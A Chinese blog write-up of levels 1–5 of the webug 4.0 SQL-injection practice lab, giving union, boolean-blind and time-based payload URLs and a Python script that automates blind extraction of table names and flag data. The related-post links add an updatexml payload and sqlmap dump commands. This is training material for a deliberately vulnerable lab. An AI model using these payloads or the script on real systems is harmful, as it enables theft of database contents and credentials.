webug靶场通关(1-5)

于 2023-11-19 21:54:37 发布
阅读量128 收藏
点赞数
文章标签: 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abv545411/article/details/134496479
版权

第一关:显错注入

单双引号测试,单引号报错,使用单引号闭合,order by 2时正常,3不正常,所以是2个字段

union select 1,2在2处显示

http://192.168.150.128/webug4.0-master/control/sqlinject/manifest_error.php?id=222' union select 1,database()--+

得到数据库: webug

http://192.168.150.128/webug4.0-master/control/sqlinject/manifest_error.php?id=222' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

得到表: data_crud,env_list,env_path,flag,sqlinjection,user,user_test

http://192.168.150.128/webug4.0-master/control/sqlinject/manifest_error.php?id=222' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+

得到字段: id,flag

http://192.168.150.128/webug4.0-master/control/sqlinject/manifest_error.php?id=222' union select 1,group_concat(id,0x7e,flag) from flag--+

得到flag: dfafdasfafdsadfa

第二关:布尔注入

用单双引号去测试,发现单引号不正常

这是正常页面

单引号不正常

页面没回显,用盲注,以页面的正常与不正常来判断,这里用布尔盲注

http://192.168.150.128/webug4.0-master/control/sqlinject/bool_injection.php?id=1' and if(length(database())=5,1,0)--+

页面正常,判断出database的长度是5

http://192.168.150.128/webug4.0-master/control/sqlinject/bool_injection.php?id=1' and if(substring(database(),1,1)='d',1,0)--+

burp抓包发送到攻击器,设定变量

跑出的结果是webug

爆表名:http://192.168.150.128/webug4.0-master/control/sqlinject/bool_injection.php?id=1' and if(substring((select group_concat(table_name) from information_schema.tables where table_schema =database()),1,1)="g",1,0)--+

还是和上面相同的步骤,这里就不放图了

这里添加一个提取

得到数据表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test

我的这个burp字典有点问题,缺少几个字母.....,所以这里显示出来的不全,我这里放的是第一关跑出来的表名,大家正常跑是能跑出来的

爆列名:http://192.168.150.128/webug4.0-master/control/sqlinject/bool_injection.php?id=1' and if(substring((select group_concat(column_name) from information_schema.columns where table_name ='flag'),1,1)='g',1,0)--+

字段:id,flag

爆数据:http://192.168.150.128/webug4.0-master/control/sqlinject/bool_injection.php?id=1' and if(substr((select group_concat(id,flag) from flag),1,1)='h',1,0)--+

得到flag:dfafdasfafdsadfa

咦flag不正确??

仔细看和第一关的flag一样,看来得在其他表中找了,步骤是一样的,不过多赘述了

第三关:延时注入

尝试单双引号的测试,有页面不正常的,看来也是可以用到布尔盲注的,我尝试了一下,布尔盲注也是也可以的

这道题的延时盲注步骤和第二关是一样的,就不多做赘述了,将拼接的sql语句附上,其中的表名,字段名自行替换

1.爆库
1' and if(length(database())=1,sleep(2),0)--+    

1' and if(substring(database(),1,1)='a',sleep(2),0)--+

2.爆表
1' and if(substring((select group_concat(table_name) from information_schema.tables where table_schema =database()),1,1)="g",sleep(5),0)--+     

3.爆字段
1' and if(substring((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1)='g',sleep(5),0)--+

4.爆数据
1' and if(substring((select group_concat(user,password) from users), 1, 1) = 'g', sleep(5), 0)#

第四关:POST注入

一个全新的界面,尝试点了其他的链接都打不开,发现一个搜索框,随便输入一些,页面都正常,当输入单引号时,页面报错

页面报错

看来注入点就在搜索框这里

order by 2页面正常,说明有两个字段

想着用联合查询的方式,测试后页面没有回显,所以使用延时注入

还是使用第三关的sql语句拼接,但是结尾的注释符记得换成# 然后burp跑就完事了

跑不出来的请看第五关,尝试第五关的py文件

第五关:过滤注入

页面和第四关一样,还是在搜索框注入,尝试延时注入,我用的' and if(length(database())=1,sleep(2),0)#

但是秒开,换了sleep(1000)还是秒开,在网上找了几篇文章,才发现这道题的过滤点原来是在这里,参考下面这篇文章

webug 4.0 第四关 POST注入_在ubuntu完成一次post注入-CSDN博客

所以这个地方不能用老方法and了,改成or

sql语句

1.爆库
' or if(length(database())=1,sleep(2),0)#   

1' or if(substring(database(),1,1)='d',sleep(2),0)#

2.爆表
' or if(substring((select group_concat(table_name) from information_schema.tables where table_schema =database()),1,1)="g",sleep(5),0)#   

3.爆字段
' or if(substring((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1)='g',sleep(5),0)#

4.爆数据
' or if(substring((select group_concat(user,password) from users), 1, 1) = 'g', sleep(5), 0)#

burp跑了一下,发现不好排序,貌似跑出来的不对

在网上找了个脚本,试了下效果可以,自行修改长度和url

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},!@#$%^&*()_+-="
url = "http://192.168.1.100/control/sqlinject/post_injection.php"
name = ""

# 难得的爆长度了,随便选个较大的。
for i in range(1, 50):
    print(i)
    for char in chars:
        # 爆数据库名webug
        # payload = "1' or if(ascii(substr(database()," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
        # 爆表名
        payload = "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables " \
                 "where table_schema=database())," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
        # 爆列名
        # payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns " \
        #           "where table_name='输入列名')," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
        # 爆字段
        # payload = "1' or if(ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
        data = {
            "keyWordName": payload,
        }
        start = time.time()
        res = requests.post(url, data=data)
        end = time.time()
        if end - start >= 5:
            name += char
            print(name)
            break

效果图

剩下的数据可以更改脚本中的payload即可

xiaohaisec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Webug4.0靶场通关笔记(第九天)--------完结篇
Yasso的博客
02-27 1021
一、文件包含漏洞 二、命令执行 三、webshell爆破 四、ssrf 明天就开学了~~唉,剩下的就都打完算了!!! 一、文件包含漏洞 文件包含漏洞在ctf上种类有很多,我接触过的有php伪协议、日志包含、目录遍历、session文件包含等等。全阐述的话我是讲不完(主要还是菜),就拿这webug4.0的靶场当例子吧. 打开靶场注意url栏(文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码(index.php),这里用的是base64读取) ?filename=php://fi
Webug4.0靶场通关笔记(第八天)--------22-26
Yasso的博客
02-26 516
一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转 一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转
Webug4.0靶场通关
自强不息
02-05 2808
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
webug4.0靶场通关笔记
qq_47289634的博客
07-13 1199
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的。打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样。
Webug4.0靶场通关笔记(第五天)--------9-13
Yasso的博客
02-23 1270
一、反射型XSS 二、存储型XSS 三、万能密码登陆 四、DOM型xss 五、过滤xss 一、反射型XSS 跨站脚本(XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种,允许恶意用户将代码注入网页,这类攻击常包含HTML和用户端脚本语言。 这道题没有过滤。 经测试发现,标红的地方1是我们可以注入的点 我们测试发现,可以注入代码标签 <script>alert(123)</script> 我们获取一下cookie <script>.
sql靶场通关8-10
09-24
sql靶场8-10详解
sqllib靶场1-5通关详解
09-24
详细记载了sqllib靶场1-5的通关
Webug 4.0下载地址-附件资源
03-02
Webug 4.0下载地址-附件资源
vuInhub靶场实战系列-Kioptrix Level #1
最新发布
06-08
vuInhub靶场实战系列-Kioptrix Level #1
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1240
webug靶场过关秘籍
Webug4.0靶场通关笔记(第三天)--------过滤注入和宽字节注入
Yasso的博客
02-21 720
一、过滤注入 这一关为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四关POST注入一样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------但页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
Webug4.0靶场通关笔记(第二天)--------延时注入和post注入
Yasso的博客
02-20 781
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
靶场练习-Webug-渗透基础
Bcat_ZC的博客
07-06 119
016-输入www.taobao.com提示不行只能10.10.10.10访问,把host改为10.10.10.10不行,改referer也不行,查看资料,提示需要看源文件,其中源代码提示refer需要是百度才行,输入以后看到flag。根据提示跳转页面,查看网页代码和抓包,没有眉目,查看了一下网上的资料,发现如果有跳转漏洞,可以?003-按照提示,把网页文件去掉,看到有目录,其中test目录又有提示,按照提示将test加密,得到的和另一个目录一样的字符串,点开以后得到提示。013-xss漏洞,
Webug3.0靶场第一关学习
weixin_43460822的博客
07-09 937
前言:没有任何基础,且这是第一次接触靶场,不要说题目看不懂,就连如何进入靶场都成难题。知道自己不会还好,就怕明明不会、没有进入靶场且以为进入靶场误以为自己已成功进入靶场,我就是这样子。之前直接在win2003上打开靶场,就觉得自己对了,但不是这样子的,到现在我才知道如何进入靶场。 进入靶场方法 用winrar将安装包解压,用VM虚拟机打开解压文件里的win2003虚拟机文件。进入虚拟机系统后,...
webug靶场渗透基础攻略
qq_28719743的博客
10-22 5346
文章目录安装第一关第二关 安装 下载解压后,打开虚拟机 修改网络为桥接模式 虚拟机cmd中输入ipconfig查看局域网ip地址 我这边是192.168.0.101 浏览器访问一下 没毛病,第一步完成了,现在开始练习 第一关 这题目…一开始我就没明白要干什么 看了二三关的题目后,才明白过来是要找出id为1的值的flag 接下来我们使用sqlmap 查询当前的数据库名 sqlmap -u...
打靶webug3.0前21题入坑总结
goddemon
05-23 465
第一题,前面的文章写过 第二题(考察文件捆绑和复原) 即文件捆绑且还原的方法状况,改为txt查看文件的代码后,发觉里面有个txt,如何将文件名改为zip用winrar打开即获得txt,打开txt即是密码 第三题(考察文件目录网页的获取与分析) 典型直接用目录爆破工具既可爆出 常用的目录爆出工具 御剑和dirbuster工具 爆破后进入网页,发觉提示去把目录名解密MD5,即解密MD532位的即目录拿回来即结束 第四题(考察利用burpsuite爆破) 这个就不给图了,直接考虑用burpsuite爆破常见
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 758
显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值